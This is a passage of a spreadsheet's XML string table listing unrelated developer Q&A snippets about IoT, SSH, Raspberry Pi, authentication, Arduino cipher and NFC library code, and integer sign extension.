220-IPv6 connections are also welcome on this serve331 User xxxxx OK.</t>
  </si>
  <si>
    <t>It is weird that you do not pass certificate anywhere only the certId.Does anyone have a good working example connecting to aws-iot using Mqtt?</t>
  </si>
  <si>
    <t>Calling  solved this hidden bug.</t>
  </si>
  <si>
    <t>The motd runs multiple commands on login via SSH and constructs a message which it outputs to the user.</t>
  </si>
  <si>
    <t>It is causing a SIGSEGV possibly due to some invalid memory access.</t>
  </si>
  <si>
    <t>You can also specify the user name and password for the account you want to use in your connection string as well (although I wouldn't really recommend it): jdbc:mysql://192.168.1.11:3306/foo?user=userName&amp;password=pass.</t>
  </si>
  <si>
    <t>You need to use the new Universal (Unencrypted Mode) authentication method with build 10586.</t>
  </si>
  <si>
    <t>So you have to secure your python code, but Unix users &amp; groups too and mysql config too.</t>
  </si>
  <si>
    <t>Unregistered devices and applications would be unable to put to that topic space.</t>
  </si>
  <si>
    <t>Normally we advise the network operator to whitelist the button's MAC
  address, but I see you've already ruled that out.</t>
  </si>
  <si>
    <t>Also you have an issue with anything connected (well, not anything, but remove it just to be safe) when you're trying to program.</t>
  </si>
  <si>
    <t>I would be suprised if you could access each mic's device info individually UNLESS the HAL supports this (although after looking I haven't seen anything in the documentation).</t>
  </si>
  <si>
    <t>You can reference "Device identity properties" part.</t>
  </si>
  <si>
    <t>In general, you can't copy text from a remote system program to the current system natively over SSH.</t>
  </si>
  <si>
    <t>Ok found out that rc.local does not need sudo because it is already running as root.</t>
  </si>
  <si>
    <t>From Google Cloud IoT Core + ATECC608 documentation: 
For example, the private key is generated by the secure element
  itself, not an external party (CA).</t>
  </si>
  <si>
    <t>Check if the user that runs TestPiPlate.exe have execution permissions on the test.py file.</t>
  </si>
  <si>
    <t>Error happen because you process null data before you do validation.</t>
  </si>
  <si>
    <t>The NSHost class provides methods to access the network name and address information for a host.</t>
  </si>
  <si>
    <t>A property of Microsoft's .NET Framework that returns the security context of the current user or application.</t>
  </si>
  <si>
    <t>ROAuth is an R package that "provides an interface to the OAuth 1.0 specification, allowing users to authenticate via OAuth to the server of their choice."</t>
  </si>
  <si>
    <t>authentication) and then checking to see if that user should have access to a specific resource or URL.</t>
  </si>
  <si>
    <t>Use the Sinch SDKs and APIs to enhance your app with Voice, SMS, Verification, and Instant Messaging.</t>
  </si>
  <si>
    <t>A unique code assigned for identification of a single unit or device.</t>
  </si>
  <si>
    <t>Questions about extending Karabiner's functionality through use of private.xml</t>
  </si>
  <si>
    <t>`git-secret` is a bash tool to store your private data inside a git repo.</t>
  </si>
  <si>
    <t>It is the approximate equivalent of hiding the front door key under the mat.</t>
  </si>
  <si>
    <t>After authentication is successful, user is redirected to the URL they originally tried to visit.</t>
  </si>
  <si>
    <t>A Web crawler is one type of bot, or software agent.</t>
  </si>
  <si>
    <t>1 That is, a superkey that would stop being unique (and therefore, being a superkey) if any of the attributes were removed from it.</t>
  </si>
  <si>
    <t>Implementors are typically registered as beans in the application context.</t>
  </si>
  <si>
    <t>This project is based on the need for a private message system for ging / social_stream.</t>
  </si>
  <si>
    <t>For general information on JSR-303, see the Bean Validation Specification.</t>
  </si>
  <si>
    <t>An example of this is the derived unique key per transaction method.</t>
  </si>
  <si>
    <t>Integrated security systems, units, or entities are assembled by joint services.</t>
  </si>
  <si>
    <t>The software also embeds an authentication module to manage access rights.</t>
  </si>
  <si>
    <t>the key might be memorized by a human being, in which case it is called a password).</t>
  </si>
  <si>
    <t>For example, once opted in, instead of allowing any string assignment to innerhtml, the browser only accepts TrustedHTML values.</t>
  </si>
  <si>
    <t>Validations are provided for email, phone, URL, etc.</t>
  </si>
  <si>
    <t>This method allows users or programs to log in without having to specify a password.</t>
  </si>
  <si>
    <t>X509Certificate is a class for handling X.509 certificates in .NET (MSDN Entry) and in Java (Javadoc).</t>
  </si>
  <si>
    <t>Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious or simply do nothing to call attention to themselves.</t>
  </si>
  <si>
    <t>I want to remove permanently "someKey" property form JSON twin.</t>
  </si>
  <si>
    <t>In contrast to their example, I could execute this command as the unprivilegied user pi, instead of root.</t>
  </si>
  <si>
    <t>Here's a simple example:
You'll see that your key presses are registered - they're just strings.</t>
  </si>
  <si>
    <t>The userdel command modifies the system account files, deleting all entries that refer to the user name LOGIN.</t>
  </si>
  <si>
    <t>This is especially true of non-protected content (which often uses the file extension .m4p).</t>
  </si>
  <si>
    <t>If that is not the case, then database corruption can result.</t>
  </si>
  <si>
    <t>Scroll to the end and you'll see two fingerprints, SHA-256 and SHA-1.</t>
  </si>
  <si>
    <t>The digital certificate certifies the ownership of a public key by the named subject of the certificate.</t>
  </si>
  <si>
    <t>Driver needed for it:
https://gitorious.org/beagleboard-validation/linux/source/1114ff9f28693ec6893a1a0ddc8df5f57ab89916:drivers/media/video/ov7670.c
Site with info/etc..:
http://embeddedprogrammer.blogspot.com/2012/07/hacking-ov7670-camera-module-sccb-cheat.html</t>
  </si>
  <si>
    <t>Is there any way to pass this authentication across from the Raspberry pi?</t>
  </si>
  <si>
    <t>When I'm trying to connect with ssh or vncviewer no results.</t>
  </si>
  <si>
    <t>following are my codes:</t>
  </si>
  <si>
    <t>Now I want to add user id and password and click on login but not able to do that.</t>
  </si>
  <si>
    <t>Reflash the firmware and upload code again.</t>
  </si>
  <si>
    <t>Headless, use a other computer and create a file named ssh.</t>
  </si>
  <si>
    <t>Add the public key as an "access key" on just the repo(s) that need it.</t>
  </si>
  <si>
    <t>We would rather use the IdentityServer code that already exists to do this.</t>
  </si>
  <si>
    <t>I can only assume that because I started with an insider build that did not support Bluetooth it has got itself into an unexpected state.</t>
  </si>
  <si>
    <t>Calendars and address books are available for both local and remote access, possibly limited through authentication policies.</t>
  </si>
  <si>
    <t>With Bluez I was able to get the MAC adresses of beacons with this command 
sudo hcitool lescan
But this return MAC adresses and not the detected UUID, Major and Minor values.Did someone have an idea how to get them ?</t>
  </si>
  <si>
    <t>So I want to create a login page that ask a password and login that is connected with a database and when the combination is correct he get access to the webpage that I created.</t>
  </si>
  <si>
    <t>The hello.sh file activates a virtual env and starts a security camera program on a raspberry pi.</t>
  </si>
  <si>
    <t>This api internally makes 2 httpclient calls  to azure rest api  :
to enroll the device as individual enrollment.</t>
  </si>
  <si>
    <t>I am getting the following messages
Command:
Screen output:
Note:
If I use ssh in my pi, it works.</t>
  </si>
  <si>
    <t>Now I have a serial transmission over a RF link module that is stable and has very few corrupt entries.</t>
  </si>
  <si>
    <t>The simplest way is to run 
At a PowerShell prompt type
az login
The az login command will open a new web browser window and ask your to log into your Azure Subscription account.</t>
  </si>
  <si>
    <t>Both devices are connected to your Google account, such that personal queries will return the same response on both devices.</t>
  </si>
  <si>
    <t>: I want the Pi to delete spezific data from a Database if the QR-Code gets scanned from a Mobile Device inside my Network.</t>
  </si>
  <si>
    <t>I set up a Proxy command to get to a test box I'm working on that is acting like a host and is not connected to the internet.</t>
  </si>
  <si>
    <t>Not knowing much about SSL and certificates, I've just been hunting for solutions and blindly executing commands with no success.</t>
  </si>
  <si>
    <t>PID: 2536 SIG: 9
UPDATE: 
After changing the NmeaParser from 19 to 2 here:
Im not getting the crash but I am still getting Invalid GSV messages.</t>
  </si>
  <si>
    <t>Being case sensitive, theyre called SETTINGS, System and Storage.</t>
  </si>
  <si>
    <t>Am I opening myself up to any security issues by returning keys directly to a client?</t>
  </si>
  <si>
    <t>I have an Arduino script to send commands to some sensitive hardware.</t>
  </si>
  <si>
    <t>It is destroyed before the caller can access it, giving undefined behaviour; in practice it may or may not be overwritten with someone else's data.</t>
  </si>
  <si>
    <t>I don't think this is an ssh connection issue, from what you say the program seems to execute and exit.</t>
  </si>
  <si>
    <t>You can use software implementation to get an ID from the arduino and validate it at the Desktop application.</t>
  </si>
  <si>
    <t>The setup script did NOT put the certs in that folder unfortunately.</t>
  </si>
  <si>
    <t>According to www.prokarma.com's blog they use 
a repository for storing key value pairs being pushed from devices
  connected to the internet.</t>
  </si>
  <si>
    <t>if you are specific about a mobile phone which is already paired then you might need to establish a higherlayer connection ( such as SPP) with Authentication and encryption.</t>
  </si>
  <si>
    <t>Names for python modules are not protected and
'munin' is a obvious choice used by more than one developer.</t>
  </si>
  <si>
    <t>After some more reasearches, I learned that apparently the constructor builds the WiFi Shields with outdated firmware.</t>
  </si>
  <si>
    <t>You will be prompted in browser  to let the tool to use your account and the you will receive an authentication code.</t>
  </si>
  <si>
    <t>You may have to fix the permissions like this chmod +x test1.py
In some cases the server will use this information to run the script.</t>
  </si>
  <si>
    <t>* A determined attacker can run a 'dictionary attack' to try to generate the psk formed from the SSID and the pass phrase.</t>
  </si>
  <si>
    <t>SO if your ESP8266 gets connected to MQTT Broker in a single hit then your Reconnect() will not be called.</t>
  </si>
  <si>
    <t>This tag references different approaches to validate your application's incoming data using Laravel.</t>
  </si>
  <si>
    <t>django-authentication refers to the built-in auth module for authentication &amp; authorization that can be extended.</t>
  </si>
  <si>
    <t>For more information, see the section below about saving files that are app-private.</t>
  </si>
  <si>
    <t>Support tunneling through HTTP proxy (via CONNECT method) (RFC 2817)
Run with system startup
Working on Windows 95/98/ME/NT/2000/XP/Longhorn/Blackcomb(?)</t>
  </si>
  <si>
    <t>Correlation allows for the automated use of these unique tokens in test scripts.</t>
  </si>
  <si>
    <t>You can also host user profile info that you can use to build engaging experiences.</t>
  </si>
  <si>
    <t>However these are becoming increasing unreliable as the automated spam systems that they are trying to defeat are becoming much better at reading the distorted text.</t>
  </si>
  <si>
    <t>Enable
encodings, exit, site, stdin, stdout, stderr and traceback features.</t>
  </si>
  <si>
    <t>django-authentication refers to the built-in  module for authentication &amp; authorization that can be extended.</t>
  </si>
  <si>
    <t>if the user shall not be asked for a password, consider an entry in the sudoers file, and use the usual sudo python program.py.</t>
  </si>
  <si>
    <t>The best way around this for your use case is probably to add an Alias to your Apache config.</t>
  </si>
  <si>
    <t>As an added bonus, you can also see whether or not the SSH-port is open.</t>
  </si>
  <si>
    <t>Wind River continues to exist
  as a wholly owned subsidiary of Intel.</t>
  </si>
  <si>
    <t>The sftp-server binary is kept for a backwards compatibility)
ssh - SSH terminal client
sftp - SFTP client
scp - SCP client (internally it works as SCP server too)
Other tools included are ssh-add, ssh-agent, ssh-keysign, ssh-keyscan, ssh-keygen and ssh-keysign.</t>
  </si>
  <si>
    <t>It is possible to view encrypted private network television stations that are not broadcast over the air with internal and external tuner options that support the insertion of a CableCard provided by the Cable TV company.</t>
  </si>
  <si>
    <t>Check for sshd_config file for errors such as:
RSAAuthentication 
PubkeyAuthentication
Do a ssh-copy-id 
I may miss out others.</t>
  </si>
  <si>
    <t>.X0-lock and X0 in /tmp/ folder do exist.</t>
  </si>
  <si>
    <t>If you are running it headless (without a separate monitor) then you need to use ssh to log in from another computer ( in the terminal window).</t>
  </si>
  <si>
    <t>However, it still exists in Opera 12.
links
Demo of the information leak
Mozilla Announcment</t>
  </si>
  <si>
    <t>American Express has added SafeKey to UK and Singapore on 8 November 2010.</t>
  </si>
  <si>
    <t>You can also add the Google+ Sign-In button to your Android or iOS app.</t>
  </si>
  <si>
    <t>I provided the code with my SSID and password then uploaded it to the esp32.</t>
  </si>
  <si>
    <t>&lt;Key&gt;-event:  922 590070390  Caps_Lock 65509 .</t>
  </si>
  <si>
    <t>If your endpoint has -ats at the end of the first subdomain, then it is an Amazon Trust Services endpoint.</t>
  </si>
  <si>
    <t>//Following code is to generate the SAS token programatically.</t>
  </si>
  <si>
    <t>I'm looking for a way to make a ttyUSB device, or an another method to decide which scanner sent the information.</t>
  </si>
  <si>
    <t>However, I can't connect to my database and it is causing a 500 internal server error saying "website.com is unable to handle this request" whenever I try to submit login info.</t>
  </si>
  <si>
    <t>Now I have written a simple app in Android Studio to send a command using SSH.</t>
  </si>
  <si>
    <t>I2C devices are not probed automatically when module is loaded (I2C does not offer any standard method for this).</t>
  </si>
  <si>
    <t>It is recommended you offer the user a final confirmation page before paying but this is not necessary.</t>
  </si>
  <si>
    <t>These include several standard wire-level protocols, plus their own protocol called OpenWire.</t>
  </si>
  <si>
    <t>header file:
#ifndef CIPHER_H
#define CIPHER_H
#ifdef AVR /* AVR */
#include &lt;avr/pgmspace.h&gt;
#endif /* AVR */
/*
 *
 * Run the encryption key schedule
 * ... key - the cipher key
 * ... roundKeys - the encryption round keys
 *
 */
 void runEncryptionKeySchedule(uint8_t *key, uint8_t *roundKeys);
/*
 *
 * Run the decryption key schedule
 * ... key - the cipher key
 * ... roundKeys - the decryption round keys
 *
 */
void runDecryptionKeySchedule(uint8_t *key, uint8_t *roundKeys);
/*
 *
 * Encrypt the given block using the given round keys
 * ... block - the block to encrypt
 * ... roundKeys - the round keys to be used during encryption
 *
 */
void encrypt(uint8_t *block, uint8_t *roundKeys);
/*
 *
 * Decrypt the given block using the given round keys
 * ... block - the block to decrypt
 * ... roundKeys - the round keys to be used during decryption
 *
 */
void decrypt(uint8_t *block, uint8_t *roundKeys);
/*
 *
 * Optimization levels
 * ... OPTIMIZATION_LEVEL_0 - O0
 * ... OPTIMIZATION_LEVEL_1 - O1
 * ... OPTIMIZATION_LEVEL_2 - O2
 * ... OPTIMIZATION_LEVEL_3 - O3 = defualt
 *
 */
#define OPTIMIZATION_LEVEL_0 __attribute__((optimize("O0")))
#define OPTIMIZATION_LEVEL_1 __attribute__((optimize("O1")))
#define OPTIMIZATION_LEVEL_2 __attribute__((optimize("O2")))
#define OPTIMIZATION_LEVEL_3 __attribute__((optimize("O3")))
/*
 * 
 * SCENARIO values:
 * ... SCENARIO_0 0 - cipher operation: encrypt &amp; decrypt one data block
 * ... SCENARIO_1 1 - scenario 1: encrypt &amp; decrypt data in CBC mode
 * ... SCENARIO_2 2 - scenario 2: encrypt &amp; decrypt data in CTR mode
 *
 */
#define SCENARIO_0 0
#define SCENARIO_1 1
#define SCENARIO_2 2
#ifndef SCENARIO
#define SCENARIO SCENARIO_0
#endif
/*
 *
 * MEASURE_CYCLE_COUNT values:
 * ... MEASURE_CYCLE_COUNT_DISABLED 0 - measure cycle count is disabled
 * ... MEASURE_CYCLE_COUNT_ENABLED 1 - measure cycle count is enabled
 *
 */
#define MEASURE_CYCLE_COUNT_DISABLED 0
#define MEASURE_CYCLE_COUNT_ENABLED 1
#ifndef MEASURE_CYCLE_COUNT
#define MEASURE_CYCLE_COUNT MEASURE_CYCLE_COUNT_DISABLED
#endif
/*
 *
 * Align memory boundaries in bytes
 *
 */
#define ALIGN_PC_BOUNDRY 64
#define ALIGN_AVR_BOUNDRY 2
#define ALIGN_MSP_BOUNDRY 2
#define ALIGN_ARM_BOUNDRY 8
#if defined(PC) &amp;&amp; !defined(ALIGNED) /* PC ALIGNED */
#define ALIGNED __attribute__ ((aligned(ALIGN_PC_BOUNDRY)))
#endif /* PC ALIGNED */
#if defined(AVR) &amp;&amp; !defined(ALIGNED) /* AVR ALIGNED */
#define ALIGNED __attribute__ ((aligned(ALIGN_AVR_BOUNDRY)))
#endif /* AVR ALIGNED */
#if defined(MSP) &amp;&amp; !defined(ALIGNED) /* MSP ALIGNED */
#define ALIGNED __attribute__ ((aligned(ALIGN_MSP_BOUNDRY)))
#endif /* MSP ALIGNED */
#if defined(ARM) &amp;&amp; !defined(ALIGNED) /* ARM ALIGNED */
#define ALIGNED __attribute__ ((aligned(ALIGN_ARM_BOUNDRY)))
#endif /* ARM ALIGNED */
/* 
 *
 * RAM data types 
 *
 */
#define RAM_DATA_BYTE uint8_t ALIGNED
#define RAM_DATA_WORD uint16_t ALIGNED
#define RAM_DATA_DOUBLE_WORD uint32_t ALIGNED
#define READ_RAM_DATA_BYTE(x) x
#define READ_RAM_DATA_WORD(x) x
#define READ_RAM_DATA_DOUBLE_WORD(x) x
/* 
 *
 * Flash/ROM data types 
 *
 */
#if defined(AVR) /* AVR */
#define ROM_DATA_BYTE const uint8_t PROGMEM ALIGNED
#define ROM_DATA_WORD const uint16_t PROGMEM ALIGNED
#define ROM_DATA_DOUBLE_WORD const uint32_t PROGMEM ALIGNED
#define READ_ROM_DATA_BYTE(x) pgm_read_byte(&amp;x)
#define READ_ROM_DATA_WORD(x) pgm_read_word(&amp;x)
#define READ_ROM_DATA_DOUBLE_WORD(x) pgm_read_dword(&amp;x)
#else /* AVR */
#define ROM_DATA_BYTE const uint8_t ALIGNED
#define ROM_DATA_WORD const uint16_t ALIGNED
#define ROM_DATA_DOUBLE_WORD const uint32_t ALIGNED
#define READ_ROM_DATA_BYTE(x) x
#define READ_ROM_DATA_WORD(x) x
#define READ_ROM_DATA_DOUBLE_WORD(x) x
#endif /* AVR */
/*
 *
 * Scenario 2 round keys are stored in Flash/ROM
 *
 */
#if defined(SCENARIO) &amp;&amp; (SCENARIO_2 == SCENARIO)
#define READ_ROUND_KEY_BYTE(x) READ_ROM_DATA_BYTE(x)
#define READ_ROUND_KEY_WORD(x) READ_ROM_DATA_WORD(x)
#define READ_ROUND_KEY_DOUBLE_WORD(x) READ_ROM_DATA_DOUBLE_WORD(x)
#else
#define READ_ROUND_KEY_BYTE(x) READ_RAM_DATA_BYTE(x)
#define READ_ROUND_KEY_WORD(x) READ_RAM_DATA_WORD(x)
#define READ_ROUND_KEY_DOUBLE_WORD(x) READ_RAM_DATA_DOUBLE_WORD(x)
#endif
#endif /* CIPHER_H */
and c code file:
#include &lt;stdint.h&gt;
#include "cipher.h"
#include "rot8.h"
#include "constants.h"
void encrypt(uint8_t *block, uint8_t *roundKeys)
{
  uint8_t       *block8  = (uint8_t *)block;
  const uint8_t *rk       = (uint8_t *)roundKeys;
  uint8_t y = block8[0];
  uint8_t x = block8[1];
  uint8_t i;
  for (i = 0; i &lt; NUMBER_OF_ROUNDS; ++i) {
    x = (rot8r8(x) + y) ^ READ_ROUND_KEY_DOUBLE_WORD(rk[i]);
    y = rot8l3(y) ^ x;
  }
  block8[0] = y;
  block8[1] = x;
}
`
I search all sources.</t>
  </si>
  <si>
    <t>Crypto/Encryption Support</t>
  </si>
  <si>
    <t>The general pattern of a fixed 32-bit signed integer range function is
where random32() returns uniform pseudorandom 32-bit unsigned integers, MINIMUM is the smallest integer the function can return, MINIMUM + LIMIT is the maximum integer the function can return (LIMIT = MAXIMUM - MINIMUM), and SHIFT is
31 if LIMIT == 1        15    LIMIT &lt;= 131071
30    LIMIT &lt;= 3        14    LIMIT &lt;= 262143
29    LIMIT &lt;= 7        13    LIMIT &lt;= 524287
28    LIMIT &lt;= 15       12    LIMIT &lt;= 1048575
27    LIMIT &lt;= 31       11    LIMIT &lt;= 2097151
26    LIMIT &lt;= 63       10    LIMIT &lt;= 4194303
25    LIMIT &lt;= 127       9    LIMIT &lt;= 8388607
24    LIMIT &lt;= 255       8    LIMIT &lt;= 16777215
23    LIMIT &lt;= 511       7    LIMIT &lt;= 33554431
22    LIMIT &lt;= 1023      6    LIMIT &lt;= 67108863
21    LIMIT &lt;= 2047      5    LIMIT &lt;= 134217727
20    LIMIT &lt;= 4095      4    LIMIT &lt;= 268435455
19    LIMIT &lt;= 8191      3    LIMIT &lt;= 536870911
18    LIMIT &lt;= 16383     2    LIMIT &lt;= 1073741823
17    LIMIT &lt;= 32767     1    LIMIT &lt;= 2147483647
16    LIMIT &lt;= 65535     0 if LIMIT &lt;= 4294967295
In Arduino, or any C or C++ code compiled using GCC, you can use
static inline int  random_intrange(const int  minval,
                                   const int  maxval)
{
    if (maxval &gt; minval) {
        const unsigned int   limit = maxval - minval;
        const unsigned char  shift = __builtin_clz(limit);
        unsigned int         u;
        do {
            u = random_unsigned_int() &gt;&gt; shift;
        } while (u &gt; limit);
        return minval + u;
    } else
        return minval;
}
static inline unsigned int  random_uintrange(const unsigned int  minval,
                                             const unsigned int  maxval)
{
    if (maxval &gt; minval) {
        const unsigned int   limit = maxval - minval;
        const unsigned char  shift = __builtin_clz(limit);
        unsigned int         u;
        do {
            u = random_unsigned_int() &gt;&gt; shift;
        } while (u &gt; limit);
        return minval + u;
    } else
        return minval;
}
as long as random_unsigned_int() is an uniform pseudorandom number generator that returns unsigned ints, from 0 to UINT_MAX, inclusive.</t>
  </si>
  <si>
    <t>In this case (no suffix, hexadecimal value) the compiler assigns this type, according to what is the smallest type that fits the value:
int
unsigned int
long int
unsigned long int
long long int
unsigned long long int
This leads to some more considerations:
uint32_t a = 0x7FFF &lt;&lt; 8; this means that the literal is interpreted as a signed integer; the promotion to the bigger integer extends the sign, and so the result is 0xFFFFFF00
uint32_t b = 0xFFFF &lt;&lt; 8; the literal in this case is interpreted as an unsigned integer.</t>
  </si>
  <si>
    <t>Here, I ask for it to be in big-ending mode by using the &gt; prefix (you can use &lt; for little-endian, or = for native) and then I say there is a single unsigned short (16-bits integer) represented by the H.
Other possibilities are b for a signed byte, B for an unsigned byte, h for a signed short (16-bits), i for a signed 32-bits integer, I for an unsigned 32-bits integer.</t>
  </si>
  <si>
    <t>and it gives this error
http://i.stack.imgur.com/MNvl9.jpg
And these are the detailed errors  
This is the .h file with the library
 // PN532 library by adafruit/ladyada
// MIT license
// authenticateBlock, readMemoryBlock, writeMemoryBlock contributed
// by Seeed Technology Inc (www.seeedstudio.com)
#include &lt;Arduino.h&gt;
#define PN532_PREAMBLE 0x00
#define PN532_STARTCODE1 0x00
#define PN532_STARTCODE2 0xFF
#define PN532_POSTAMBLE 0x00
#define PN532_HOSTTOPN532 0xD4
#define PN532_FIRMWAREVERSION 0x02
#define PN532_GETGENERALSTATUS 0x04
#define PN532_SAMCONFIGURATION  0x14
#define PN532_INLISTPASSIVETARGET 0x4A
#define PN532_INDATAEXCHANGE 0x40
#define PN532_MIFARE_READ 0x30
#define PN532_MIFARE_WRITE 0xA0
#define PN532_AUTH_WITH_KEYA 0x60
#define PN532_AUTH_WITH_KEYB 0x61
#define PN532_WAKEUP 0x55
#define  PN532_SPI_STATREAD 0x02
#define  PN532_SPI_DATAWRITE 0x01
#define  PN532_SPI_DATAREAD 0x03
#define  PN532_SPI_READY 0x01
#define PN532_MIFARE_ISO14443A 0x0
#define KEY_A   1
#define KEY_B   2
class PN532{
public:
    PN532(uint8_t cs, uint8_t clk, uint8_t mosi, uint8_t miso);
    void begin(void);
    boolean SAMConfig(void);
    uint32_t getFirmwareVersion(void);
    uint32_t readPassiveTargetID(uint8_t cardbaudrate);
    uint32_t authenticateBlock( uint8_t cardnumber /*1 or 2*/,
                uint32_t cid /*Card NUID*/,
                uint8_t blockaddress /*0 to 63*/,
                uint8_t authtype /*Either KEY_A or KEY_B */,
                uint8_t * keys);
    uint32_t readMemoryBlock(uint8_t cardnumber /*1 or 2*/,uint8_t blockaddress /*0 to 63*/, uint8_t * block);
    uint32_t writeMemoryBlock(uint8_t cardnumber /*1 or 2*/,uint8_t blockaddress /*0 to 63*/, uint8_t * block);
    boolean sendCommandCheckAck(uint8_t *cmd, uint8_t cmdlen, uint16_t timeout = 1000);
    //
private:
    uint8_t _ss, _clk, _mosi, _miso;
    boolean spi_readack();
    uint8_t readspistatus(void);
    void readspidata(uint8_t* buff, uint8_t n);
    void spiwritecommand(uint8_t* cmd, uint8_t cmdlen);
    void spiwrite(uint8_t c);
    uint8_t spiread(void);
};
and this the .cpp file
// PN532 library by adafruit/ladyada
// MIT license
// authenticateBlock, readMemoryBlock, writeMemoryBlock contributed
// by Seeed Technology Inc (www.seeedstudio.com)
#include &lt;Arduino.h&gt;
#include "PN532.h"
//#define PN532DEBUG 1
byte pn532ack[] = {0x00, 0x00, 0xFF, 0x00, 0xFF, 0x00};
byte pn532response_firmwarevers[] = {0x00, 0xFF, 0x06, 0xFA, 0xD5, 0x03};
#define PN532_PACKBUFFSIZ 64
byte pn532_packetbuffer[PN532_PACKBUFFSIZ];
PN532::PN532(uint8_t clk, uint8_t miso, uint8_t mosi, uint8_t ss) {
    _clk = clk;
    _miso = miso;
    _mosi = mosi;
    _ss = ss;
    pinMode(_ss, OUTPUT);
    pinMode(_clk, OUTPUT);
    pinMode(_mosi, OUTPUT);
    pinMode(_miso, INPUT);
}
void PN532::begin() {
    digitalWrite(_ss, LOW);
    delay(1000);
    // not exactly sure why but we have to send a dummy command to get synced up
    pn532_packetbuffer[0] = PN532_FIRMWAREVERSION;
    sendCommandCheckAck(pn532_packetbuffer, 1);
    // ignore response!
}</t>
  </si>
  <si>
    <t xml:space="preserve">
I would suggest changing your byte array to being an unsigned byte array
then change sum to an unsigned int or unsigned short (16 bits will suffice)
Where you calculate the sum:
 sum = (sum + MSGpack[i]) &amp; 0xFF;
MSGpack[186] = (unsigned byte)sum;
I think the issue is that you are adding signed numbers together and also not limiting the output to 8 bits.</t>
  </si>
  <si>
    <t>SSH Keys can be generated using a number of supported algorithms:
Elliptic Curve Digital Signature Algorithm (ECDSA): 256, 384 or 521 bit public key
RSA:  2048-4096 bit public key
DSA:  (Digital Signature Algorithm) 1024 bit public key
Keys are commonly generated using the widely available ssh-keygen tool, although other forms of key generators exist.</t>
  </si>
  <si>
    <t>Assuming the 10 bits to be preserved should be the LSB of the  value, and should be contiguous, and that the 3 bits should be the LSB of the result, this should do the job:
You might not need all the masking operands; it depends in part on the definition of byte (probably unsigned char, or perhaps plain char on a machine where char is unsigned), but what's written should work anywhere (16-bit, 32-bit or 64-bit int; signed or unsigned 8-bit (or 16-bit, or 32-bit, or 64-bit) values for byte).</t>
  </si>
  <si>
    <t>PRNG - Pseudorandom number generator, A pseudorandom number generator (PRNG), also known as a deterministic random bit generator (DRBG),[1] is an algorithm for generating a sequence of numbers that approximates the properties of random numbers.</t>
  </si>
  <si>
    <t>As signed numbers can represent negative numbers, they lose a range of positive numbers that can only be represented with unsigned numbers of the same size (in bits) because roughly half the possible values are non-positive values.</t>
  </si>
  <si>
    <t>So the second struct should be also anonymous:
union accel_t_gyro_union
{
  struct
  {
    uint8_t x_accel_h;
    uint8_t x_accel_l;
    uint8_t y_accel_h;
    uint8_t y_accel_l;
    uint8_t z_accel_h;
    uint8_t z_accel_l;
    uint8_t t_h;
    uint8_t t_l;
    uint8_t x_gyro_h;
    uint8_t x_gyro_l;
    uint8_t y_gyro_h;
    uint8_t y_gyro_l;
    uint8_t z_gyro_h;
    uint8_t z_gyro_l;
  } reg;
  struct
  {
    int x_accel;
    int y_accel;
    int z_accel;
    int temperature;
    int x_gyro;
    int y_gyro;
    int z_gyro;
  } value;
};</t>
  </si>
  <si>
    <t>Most times, designers like to put in place protections for all 5 regardless so that re-design does not need to occur when and if the user(s) change there mind and want confidentiality, non-repudiation etc...
Mechanisms commonly used in the IA realm would be:
- Symmetric encryption schemes (AES, DES, Blowfish, etc...) for Confidentiality
- CRCs and HASHs (SHA, MD5, etc...) for error detection for Integrity
- SECDED ECC, BCH codes for error detection AND correction for Integrity
- Asymmetric encryption (RSA) for confidentiality, Authenticity and Non-repudiation
- Asymmetric signatures (RSA, ECDSA, etc...) for Authenticity and Non-repudiation
Most of the time, many techniques have to be used together to create a good IA picture.</t>
  </si>
  <si>
    <t>A 64 bit integer can represent a range of numbers:
A signed 64 bit integer can represent a range from
 to 9.223.372.036.854.775.807
An unsigned 64 bit integer can represent a range from 0 to
18.446.744.073.709.551.615</t>
  </si>
  <si>
    <t>Signed char 0xaa is promoted to signed int 0xffaa ( negative signed value is sign extended - signed char value -86 is promoted to signed int value -86 ) and signed char 0x55 to signed int 0x0055 (positive signed char value +85 is promoted to signed int value +85 ).</t>
  </si>
  <si>
    <t>Here is the simplified code that reproduces the issue on RaspberryPi (there is excessive logging to better visualize the issue):
This is the output I am getting on Raspberry console with standard g++ linux version side by side for comparison:
RPi version:                linux version:
locking in main             locking in main
locked in main              locked in main
starting thread             starting thread
starting wait               starting wait
locking in thread           locking in thread
finished waiting: 0         locked in thread
unlocking in main           unlocking in thread
joining thread              signalling cv
locked in thread            finished waiting: 1
unlocking in thread         unlocking in main
signalling cv               joining thread
thread joined               thread joined
This makes me believe the code is fine and there is a problem with RaspberryPi cross-compilation or standard libraries.</t>
  </si>
  <si>
    <t xml:space="preserve">Problem only commonly arise because the programmer is not aware of the very different behavior achieved depening on signed/unsigned when a byte its cast to a larger type (which is common in java to happen implicitly in practically any operation you can perform on a byte, since java operators like +, -, *, == are defined to operate alaways on the 32-bit sign extended value of a byte).
</t>
  </si>
  <si>
    <t>In cryptography, the Elliptic Curve Digital Signature Algorithm offers a variant of the Digital Signature Algorithm which uses elliptic curve cryptography.</t>
  </si>
  <si>
    <t>I don't have a 16-bit machine sitting around to test this on, but I can duplicate the same behavior on my 64-bit laptop with this test program:
So you can see in this program, it's not the &gt;&gt; operation that's doing the unwanted sign extension, but rather the cast from a 32-bit signed integer to a 64-bit unsigned integer, because the cast actually acts like this:
int32_t int64_t uint64_t
If you want to avoid the extra sign extensions, you should either start with an unsigned literal (as Some programmer dude suggested in his comment), or make a cast to the same-width unsigned type.</t>
  </si>
  <si>
    <t>Similarly casting it to int32_t or uint32_t will result in a sign-extension from signed char to the 32-bit wide  value 0xFFFFFFFF
If you cast to unsigned char like in uint32_t a = (unsigned char)0xFF &lt;&lt; 8; instead then the (unsigned char)0xFF will be promoted to int using zero extension4, therefore the result will be exactly the same as uint32_t a = 0xFF &lt;&lt; 8;
In summary: When in doubt, consult the standard.</t>
  </si>
  <si>
    <t>Commonly used cryptographic algorithms and protocols include, among others:
Symmetric encryption: 3DES, AES, RC4, Blowfish
Hash functions: MD5, SHA-1, SHA-2 (includes SHA-256 and SHA-512)
Asymmetric encryption: RSA
Digital signatures: RSA (similar, but not identical to, the RSA for encryption), DSA (as part of the "DSS" standard), ECDSA
Data tunneling: TLS (formerly known as "SSL"; when used to convey HTTP requests, the result is known as "HTTPS"), SSH, IPsec
Encrypted and/or signed emails: OpenPGP (standard protocol derived from the original PGP software), S/MIME
Certificates: X.509, OpenPGP (certificates are about binding identities to public keys, which are themselves used in asymmetric encryption and digital signatures)
